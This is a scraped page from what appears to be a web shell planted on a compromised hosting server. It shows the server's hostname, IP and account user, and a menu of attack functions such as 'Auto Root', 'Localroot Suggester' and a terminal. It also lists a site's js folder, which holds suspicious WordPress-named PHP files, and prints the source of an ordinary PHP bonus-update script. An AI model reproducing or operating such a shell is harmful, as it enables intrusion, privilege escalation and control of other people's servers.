Linux moon.hostseba.com 4.18.0-553.51.1.lve.el8.x86_64 #1 SMP Tue May 6 15:14:12 UTC 2025 x86_64
LiteSpeed
Server IP : 103.174.152.68 & Your IP : 216.73.216.150
Domains :
Cant Read [ /etc/named.conf ]
User : julaysp1
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home /
julaysp1 /
public_html /
js /
Delete
Unzip
Name
Size
Permission
Date
Action
datatables.net-bs4
[ DIR ]
drwxr-xr-x
2025-09-12 05:02
dist
[ DIR ]
drwxr-xr-x
2025-09-12 17:48
faces
[ DIR ]
drwxr-xr-x
2025-09-12 10:40
fonts
[ DIR ]
drwxr-xr-x
2025-09-12 09:22
light
[ DIR ]
drwxr-xr-x
2025-09-12 10:27
progressbar.js
[ DIR ]
drwxr-xr-x
2025-09-12 16:58
select2
[ DIR ]
drwxr-xr-x
2025-09-12 16:03
select2-bootstrap-theme
[ DIR ]
drwxr-xr-x
2025-09-12 18:13
wp
[ DIR ]
drwxr-xr-x
2025-09-12 17:47
.htaccess
237
B
-rw-r--r--
2025-09-01 07:26
Bangla.ttf
137.05
KB
-rw-r--r--
2023-12-20 13:06
all_list.php
0
B
-rw-r--r--
2025-09-12 16:43
api_three.txt
2
B
-rw-r--r--
2025-08-20 19:12
bcmath-min-20250911203047-20250912160900.js
14.24
KB
-rw-r--r--
2024-10-25 15:16
bcmath-min-20250911203047-20250912171144.js
14.24
KB
-rw-r--r--
2024-10-25 15:16
bcmath-min-20250911203047.js
14.24
KB
-rw-r--r--
2024-10-25 15:16
bio_complete.php
0
B
-rw-r--r--
2025-09-12 16:39
cambria-math.woff
729.15
KB
-rw-r--r--
2025-05-27 07:33
cardTokenName.txt
8
B
-rw-r--r--
2025-05-29 16:31
card_make.txt
1
B
-rw-r--r--
2025-08-20 19:12
change_bonus.php
1.34
KB
-rw-r--r--
2024-10-25 15:30
chart.js
7.95
KB
-rw-r--r--
2024-10-25 15:16
configuration.php
0
B
-rw-r--r--
2025-09-12 17:51
fontawesome-webfont.woff
79.38
KB
-rw-r--r--
2023-12-20 13:06
footer.php
2.17
KB
-rw-r--r--
2024-11-15 15:08
get_work_history.php
1.4
KB
-rw-r--r--
2024-11-14 17:27
get_work_summary.php
1.05
KB
-rw-r--r--
2024-11-14 17:28
hoverable-collapse.js
806
B
-rw-r--r--
2024-10-25 15:16
htaccess.txt
120
B
-rw-r--r--
2025-08-21 08:56
img_68a6c2f561d77.
1.69
KB
-rw-r--r--
2025-08-21 06:55
index.php
7.03
KB
-rw-r--r--
2025-09-10 08:54
jquery-file-upload.js
185
B
-rw-r--r--
2024-10-25 15:16
on_off_test.php
14.85
KB
-rw-r--r--
2024-11-17 06:25
recharge.txt
3
B
-rw-r--r--
2025-08-20 19:12
select.dataTables.min.css
3.83
KB
-rw-r--r--
2024-10-25 15:16
settings.js
3.79
KB
-rw-r--r--
2024-10-25 15:16
sign_to_server.php
0
B
-rw-r--r--
2025-09-12 16:14
smartPdfLoad-20250912181917.txt
2
B
-rw-r--r--
2025-08-20 19:12
smartPdfLoad.txt
2
B
-rw-r--r--
2025-08-20 19:12
smartRate.txt
2
B
-rw-r--r--
2025-08-20 19:12
smartTokenName.txt
8
B
-rw-r--r--
2025-05-29 16:31
template.js
4.45
KB
-rw-r--r--
2024-10-25 15:16
typeahead.js
1.88
KB
-rw-r--r--
2024-10-25 15:16
wp-blog-header.php
2.73
KB
-rw-r--r--
2025-09-01 07:25
wp-cron.php
2.73
KB
-rw-r--r--
2025-09-01 07:25
Save
Rename
<?php if (isset($_POST['submit'])) { include_once("../includes/configuration.php"); // Get the submitted values $one_hundred = $_POST['one_hundred']; $two_hundred = $_POST['two_hundred']; $three_hundred = $_POST['three_hundred']; $four_hundred = $_POST['four_hundred']; $five_hundred = $_POST['five_hundred']; $one_thousand = $_POST['one_thousand']; $id = 1; // Replace with the actual ID to update (e.g., from the session or form) // Prepare the SQL statement $sql = "UPDATE rech_bonus SET one_hundred = ?, two_hundred = ?, three_hundred = ?, four_hundred = ?, five_hundred = ?, one_thousand = ? WHERE id = ?"; // Prepare and bind $stmt = $conn->prepare($sql); $stmt->bind_param("iiiiiii", $one_hundred, $two_hundred, $three_hundred, $four_hundred, $five_hundred, $one_thousand, $id); // Execute the statement if ($stmt->execute()) { header("Location: ../bonus_control.php?msg=success&text=successfully change the rechange bonus"); exit(); } else { header("Location: ../bonus_control.php?msg=error&text=something have wrong here!"); exit(); } // Close the statement $stmt->close(); }else{ header("location: ../dashboard.php"); } ?>